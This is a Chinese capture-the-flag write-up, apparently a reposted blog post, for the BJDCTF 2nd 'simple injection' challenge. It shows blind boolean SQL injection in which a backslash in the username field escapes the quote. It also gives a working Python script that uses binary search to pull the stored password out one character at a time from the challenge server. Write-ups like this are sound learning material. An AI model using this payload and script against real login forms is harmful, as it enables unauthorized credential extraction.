zoukankan html css js c++ java

[BJDCTF 2nd]简单注入

hint.txt出现了内容。

大概意思和国赛一道题相同。

username处注入来转义单引号，password处使用sql语句整数型注入。

例如:

传入admin 和 or/**/length(database())>0#会回显stronger字样

传入admin 和 or/**/length(database())<0#会回显girl friend字样

大师傅都么得girl friend，我也没得……呀。

直接上脚本吧，二分法还是挺快的。

这里我用的三目运算，只能用正整数和0，因为用负数发现被过滤了负号。

import requests
url = "http://bc5d0433-45b5-486d-8fdd-541a8662fd10.node3.buuoj.cn/index.php"

data = {"username":"admin\","password":""}
result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		#payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid)
		payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#"%(i,mid)
		
		data['password'] = payload
		r = requests.post(url,data=data)

		if "stronger" in r.text :
			head = mid + 1
		else:
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

我太垃圾了，要努力啊。

查看全文

相关阅读:
shell学习小结
 数据结构基础
 IComparable接口实现自定义类型的排序
 RavenDb进行全文检索实现及数据统计
 移动开发经验总结(monotouch&monodroid)
Maven pom.xml中的元素modules、parent、properties以及import
StaticHtml1.0beta
asp.net 页面静态化
 JQuery常用方法
 ASP.NET无刷新多文件文件上传系统（转载）

原文地址：https://www.cnblogs.com/h3zh1/p/12669345.html